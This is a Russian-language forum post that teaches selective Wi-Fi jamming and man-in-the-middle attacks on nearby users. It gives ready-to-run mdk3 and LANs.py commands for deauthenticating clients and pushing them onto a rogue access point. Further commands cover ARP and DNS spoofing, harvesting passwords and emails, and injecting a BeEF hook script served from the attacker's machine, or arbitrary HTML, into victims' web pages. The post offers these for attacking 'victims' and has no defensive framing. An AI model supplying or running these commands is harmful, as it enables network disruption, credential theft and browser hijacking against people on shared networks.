19.05.2019 16:48
Occul
 
Возможные сценарии, когда данное может вам пригодится:
Необходимость отключить от точки доступа других людей и при этом оставить доступ самому себе.
Необходимо сделать недоступными для подключения все точки доступа, кроме вашей собственной, на которой в отношении подключившихся клиентов вы проводите разнообразные атаки (сниффинг трафика со сбором паролей, подмена DNS, заражение бэкдорами исполнимых файлов, фишинг, внедрение своего содержимого в контент HTML-страниц и всё что угодно остальное).

Требования к железу при выборочном глушении Wi-Fi
Если для тотального глушения Wi-Fi достаточно беспроводного адаптера, который может делать инъекцию фреймов, причём чем мощнее беспроводная карта, тем лучше. То логика подсказывает, что в зависимости от конкретного сценария выборочного глушения Wi-Fi может понадобиться дополнительное беспроводное оборудование.

Например, если вы хотите глушить других, но самому оставаться подключённым к Wi-Fi, то вам необходимы:

Wi-Fi карта, поддерживающая инъекцию (для глушения)
любая Wi-Fi карта (та, которой вы подключены к ТД)
Если вы хотите глушить всех вокруг чтобы клиенты подключались к вашей мошеннической точки доступа, то необходимо следующее:

Wi-Fi карта, поддерживающая инъекцию (для глушения)
Wi-Fi карта, на которой возможно поднять точку доступа (это наша мошенническая ТД, к ней должны подключаться клиенты, которые отчаялись подключиться к своим сетям)
сетевой интерфейс (необязательно беспроводной), который будет предоставлять услуги Интернет-соединения для подключившихся «жертв»
Т.е. для повторения приведённых здесь примеров у вас должно быть минимум два устройства с беспроводными картами (или одно с двумя) и минимум одна из беспроводных карт должна поддерживать инъекции.


Исключение определённых клиентов и точек доступа из Wi-Fi глушения
Имеется достаточно много вариантов, как это можно сделать.

Если вы используете программу LANs, то у неё имеется две подходящие для этих целей опции. Одна из них предназначена для пропуска определённого MAC адреса, а другая – наоборот, для установки цели (т.е. все остальные будут пропускаться).

Пример команды:

Код:
lans --jam --accesspoint ROUTER_MAC -s MAC_адрес_для_пропуска
Здесь:

--jam: глушить все или некоторые беспроводные точки 2.4GHz и клиентов в пределах досягаемости; если необходимо, то вместе с этим используйте аргументы ниже
-s MAC_адрес_для_пропуска: Задать MAC для исключения из деаутентификации. Пример: -s 00:11:BB:33:44:AA
--accesspoint ROUTER_MAC: Введите MAC адрес конкретной ТД для в качестве цели.
Т.е. LANs можно использовать как для точечного подавления конкретной беспроводной сети, так и для массового глушения.

В программе mdk3 имеются разнообразные режимы работы, в том числе несколько вариантов DoS атак. Рассмотрим на примере атаки «Режим деаутентификации / озверевшего отключения», которая задаётся командой d. Именно в этом режиме предусматриваются чёрные и белые списки MAC адресов. Поскольку программа mdk3 позволяет считывать MAC адреса из файлов, то мы можем задать сразу много MAC адресов, которые будут глушиться или, напротив, которые будут сохранять работоспособность.

Пример команды:

mdk3 wlan0 d -w <имя_файла>

Разъяснение опций:

d — Режим деаутентификации / озверевшего отключения
-w <имя_файла>, Прочитать файл содержащий MAC адреса которые не надо беспокоить (Режим белого списка)
wlan0 замените на имя своего беспроводного интерфейса.
-b <имя_файла>, Прочитать файл содержащий MAC адреса по которым нужно проводить тест (Режим чёрного списка)

Описание LANs
LANs делает впрыск кода, глушит wifi и шпионит за wifi пользователями. Программа автоматически находит самых активных пользователей WLAN, затем шпионит за ним и/или вставляет произвольные HTML/JS в страницы, которые они посетили.

Индивидуально травит таблицы ARP целевой машины, роутера и, при необходимости, DNS сервера. Не травит кого-либо ещё в сети. Отображает самые интересные куски трафика и может делать вставку пользовательского html в страницы, который они посетили. После окончания работы проводит очистку.

Также может использоваться для постоянного глушения расположенных рядом WiFi сетей. Примерный радиус действия – 1 квартал, но сильно зависит от мощности вашей WiFi карты. Есть много настроек, которые позволяют глушить всех подряд или только одного клиента. Не может одновременно глушить WiFi и шпионить.

Зависимости: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (опционально), nmap, nbtscan, tcpdump и совместимая с неразборчивым режимом беспроводная карта если вы не знаете IP вашей цели.

Домашняя страница:

Справка по LANs
Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IP_АДРЕС] [-vmac VICTIMMAC]

[-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]

[-i ИНТЕРФЕЙС] [-r ПЕРЕНАПРАВЛЯТЬ_В] [-rip IP_РОУТЕРА]

[-rmac MAC_РОУТЕРА] [-pcap PCAP] [-s SKIP] [-ch КАНАЛ]

[-m МАКСИМУМ] [-no] [-t ИНТЕРВАЛ_ВРЕМЕНИ] [--packets ПАКЕТЫ]

[--directedonly] [--accesspoint ТОЧКА_ДОСТУПА]

Нормальное использование:

-b BEEF_HOOK_URL: копировать URL крюка BeEF для вставки в каждую страницу, которую посетит жертва, например: -b
-c 'HTML CODE': вставка произвольного HTML кода в страницы, которые посетит жертва; код HTML поместите в одиночные кавычки
-d: открыть xterm с программой driftnet для просмотра всех изображений, который видят пользователи
-dns ДОМЕН: спуфить (подменять) DNS ДОМЕНа. например -dns facebook.com будет делать DNS спуфинг каждого DNS запроса о facebook.com или subdomain.facebook.com
-a: Спуфить каждый DNS запрос, который делает жертва, фактически запирая на странице портала; вместе с этой должна использоваться опция -r
-r IP_АДРЕС: используется только с опцией -dns ДОМЕН; переправляет пользователя на этот IP_АДРЕС когда тот посещает ДОМЕН
-u: печатает посещённые URL; обрезает до 150 символов и фильтрует url изображений/css/js/woff/svg, поскольку они загромождают вывод и неинтересны
-i ИНТЕРФЕЙС: указать интерфейс; по умолчанию это первый интерфейс в ip route, например: -i wlan0
-ip: нацелиться на этот IP
-n: выполнить быстрое сканирование цели с помощью nmap
-na: выполнить агрессивное nmap сканирование в фоне и вывести в [IP адрес жертвы].nmap.txt
-p: печатать имя/пароли для сделанных FTP/IMAP/POP/IRC/HTTP, HTTP POST, всех сделанных поисков, входящих/исходящих писем и IRC messages sent/received
-pcap PCAP_FILE: парсить все пакеты в файле pcap file; требуется аргумент -ip [IP адрес цели]
-rmac MAC_РОУТЕРА: введите здесь MAC адрес роутера если у вас проблемы с автоматическим его определением скриптом
-rip IP_РОУТЕРА: введите здесь IP роутера, если у вас проблемы при автоматическом его определении скриптом
-v: показать URL в вербальном режиме, что означает не обрезать их до 150 символов как при -u
--jam: глушить все или некоторые беспроводные точки 2.4GHz и клиентов в пределах досягаемости; если необходимо, то вместе с этим используйте аргументы ниже

Глушилка Wifi:
-s MAC_адрес_для_пропуска: Задать MAC для исключения из деаутентификации. Пример: -s 00:11:BB:33:44:AA
-ch КАНАЛ: Ограничить wifijammer одним каналом
-m МАКСИМУМ: Максимальное число клиентов для деаутентификации. Используйте при передвижении для предотвращения деаутентификации клентов/ТД за пределами текущего диапазона.
-no: Не очищать список деаутентификации, когда достигнуто максимальное (-m) количество комбинаций клиентов/ТД. Нужно использовать вместе с -m. Пример: -m 10 -n
-t ИНТЕРВАЛ_ВРЕМЕНИ: Время между каждым пакетом деаутентификации. По умолчанию – максимум. Если вы видите ошибки scapy вроде 'no buffer space' попробуйте: -t .00001
--packets ЧИСЛО: Количество пакетов для отправки за один приём деаутентификации. По умолчанию это 1 пакет.
--directedonly: Не отправлять пакеты деаутентификации на широковещательные адреса ТД, а только отправлять их парам клиент/ТД
--accesspoint ROUTER_MAC: Введите MAC адрес конкретной ТД для в качестве цели.
Очистка

При получении Ctrl-C:

Отключает IP форвардинг
Очищает файервол iptables
Индивидуально восстанавливает маршрутизатор и таблицы ARP жертвы

Примеры запуска LANs
Протестировано на Kali. В следующих примерах атакующей машиной будет 192.168.0.5, а 192.168.0.10 будет жертвой.

Популярное использование:
Код:
python LANs.py -u -p
Активное обнаружение цели для ARP спуфинга и вывода всех интересных не-HTTPS данных, которые они отправляют или запрашивают. Поскольку нет опции -ip, то будет сделано ARP сканирование сети, сравнение его с живым неразборчивым захватом и составлен список всех клиентов сети. Пробует присвоить тэг целям по Windows именам netbios и печатает, как много пакетов данных они отправляют/получают. Возможность захватывать пакеты с данными, которые они отправляют, очень зависит от физической близости и мощности вашей сетевой карты. Нажмите Ctrl-C, когда вы готовы и выбрали цель, которую будете ARP спуфить.

Поддерживается перехват и сбор данных из следующих протоколов: HTTP, FTP, IMAP, POP3, IRC. Напечатает первые 135 символов URL и проигнорирует URL, оканчивающиеся на .jpg, .jpeg, .gif, .css, .ico, .js, .svg и .woff. Также напечатает для всех протоколов введённые имена/пароли, сделанные поиски на любом сайте, отправленные/полученные имейлы и отправленные/полученные сообщения IRC.

Запуск LANs.py без аргументов даст вам список активных целей, а при выборе одной из них, программа будет работать как простой ARP спуфер.

Ещё пример популярного использования:
Код:
python LANs.py -u -p -d -ip 192.168.0.10
-d: открыть xterm с driftnet для просмотра всех изображений, которые видят на атакуемых машинах
-ip: IP адрес цели и пропуск активного выбора цели в начале
HTML инъекция:
Код:
python LANs.py -b http://192.168.0.5:3000/hook.js
Вставка URL ловушки BeEF в страницы, которые посещает жертва. Это просто оборачивает аргумент в тэг <script>, поэтому вы можете ввести любой адрес файла JavaScript. Пробует вставить это после первого найденного тэга в HTML страницы.
Код:
python LANs.py -c '<title>Owned.</title>'
Вставка произвольного HTML в страницы, которая посещает жертва. Сперва пробует вставить это после первого тэга <head>, если не получается, вставляет перед первым тэгом </head>. Этот пример изменит заголовок страницы на 'Owned.'

Считать из pcap:
Код:
python LANs.py -pcap libpcapfilename -ip 192.168.0.10
Для чтения из файла pcap вы должны включить IP адрес цели с опцией -ip. Файл также должен быть в формате libpcap, который всё равно является самым популярным. Одним из преимуществ чтения из pcap файла является то, что вам необязательно быть рутом для выполнения скрипта.

DNS spoofing

Код:
python LANs.py -a -r 80.87.128.67
Код:
python LANs.py -dns eff.org
Пример 1: Опция -a будет спуфить каждый отдельны DNS запрос, который жертва делает, а когда используется вместе с -r, программа будет перенаправлять его на адрес, указанный при аргументе -r. Жертва будет перенаправлена на stallman.org (80.87.128.67) не зависимо от того, что в её строке браузера.

Пример 2: Здесь будет спуфиться домен eff.org и поддомены eff.org. Если аргумент -r отсутствует, но присутствуют аргументы -a или -dns, по умолчанию скрипт будет отправлять жертве IP атакующего. Если жертва пытается перейти на eff.org, то она будет перенаправлена на IP атакующего.

Более агрессивное использование:

Код:
python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10
Глушение WiFi сетей:

Код:
python LANs.py --jam
Глушить только одну точку доступа (роутер)

Код:
python Lans.py --jam --accesspoint 01:MA:C0:AD:DY
Установка LANs
(Установка в Kali Linux)

Код:
sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan

git clone https://github.com/DanMcInerney/LANs.py.git

cd LANs.py/

Форум на базе vBulletin®
Copyright © Jelsoft Enterprises Ltd.
В случае заимствования информации гипертекстовая индексируемая ссылка на Форум обязательна.